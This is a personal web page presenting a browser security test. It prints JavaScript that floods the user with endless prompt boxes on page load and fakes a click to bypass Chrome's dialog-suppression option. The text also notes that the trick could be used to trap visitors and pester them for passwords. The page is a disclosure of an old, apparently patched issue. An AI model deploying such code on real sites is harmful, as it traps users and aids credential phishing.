Browser Security Tests
On this page, you will find the links to browser security tests I create as I concoct them. Each link will take you to a separate test that is hosted on a simplified HTML page to allow you to easily analyze how the code works after.
Infinite Prompt/Alert/Confirm Boxes On Load
Infinite prompt boxes on load on Google Chrome 5
- Test page link: Infinite Prompt/Alert/Confirm Boxes On Load
- This test requires javascript enabled on your browser.
- It creates an infinite number of prompt boxes right when you load the page, disabling you from leaving or doing anything.
- You can stop the test at any time by typing “stop” into the prompt box.
- I have tested this on Google Chrome 5 and it basically hobbles the browser if I didn’t give you an option to stop. Even checking the “Prevent this page from creating additional dialogs” does not work because I bypassed that with a simulated mouse click on the page.
- For Google Chrome, this exploit can be mitigated by using my Better Pop Up Blocker extension: http://optimalcycling.com/other-projects/better-pop-up-blocker/
- I have also tested this on Internet Explorer 8 and Firefox 3.6. They both show an infinite number of prompt boxes. Safari likely will as well.
- Opera 10.6 also shows an infinite number of prompt boxes but it’s prompt boxes are non-modal so it is less serious. However, older versions of Opera do not have non-modal dialogue boxes.
- A malicious person could use this to keep you on a page and keep loading ads/exploits or they could try some social engineering and keep pestering a user for login names and passwords to their e-mail/social sites/banking/etc…
The core javascript code that enables me to create an infinite number of prompt/alert/confirm boxes on any browser with javascript enabled is shown below:
var totalCount = 0;
var okayToStart = true;
function fireEvent(obj,evt){
// We simulate a mouse event
var fireOnThis = obj;
if( document.createEvent ) {
var evObj = document.createEvent('MouseEvents');
evObj.initEvent( evt, true, false );
fireOnThis.dispatchEvent(evObj);
} else if( document.createEventObject ) {
document.createEventObject();
fireOnThis.fireEvent('on'+evt);
}
}
function notice() {
if (okayToStart)
{
for (; totalCount < 5; totalCount++) { var dataEntered=prompt("\nEnter \"stop\" into the input box below to stop this test. You will see an infinite number of prompt boxes otherwise." + "\n\nYou can't prevent them even when you check the box to prevent more message boxes from showing." + "\n\nIf I didn't give you the option to stop this test, you would have had to force quite your browser to use it again." + "\n\nOr worse, I could have kept prompting you for a password to your e-mail account and force you to stay on this page until you do."); if (dataEntered != null && dataEntered.toLowerCase() == "stop" || dataEntered.toLowerCase() == "'stop'" || dataEntered.toLowerCase() == '"stop"') { totalCount = 9999999; okayToStart = false; break; } // The next command nullifies the action of the "prevent more dialogue boxes" fireEvent(document.getElementById('nullify_link'),'click'); if (totalCount >= 4)
totalCount = 0;
}
}
}
// In the body of our code, we have <a id="nullify_link" href="#"></a>
The infinite prompt boxes are started off by simply calling “notice();” in the body of our HTML page. Note that the “nullify_link” is simply the id of an empty link on the page. By having the javascript simulate a mouse click on this empty link, we are able to bypass the “Prevent this page from creating additional dialogs” option in Google Chrome.
This exploit no longer works on Chrome. If you click “Cancel,” select the “Prevent this page …” box in the second-round of popups and then click “Cancel,” the modal box goes away for good.
(There’s no date on this page, and I’m not sure when Chrome 5 was the current version, so it’s possible this exploit was fixed years ago.)
todd
Leave your response!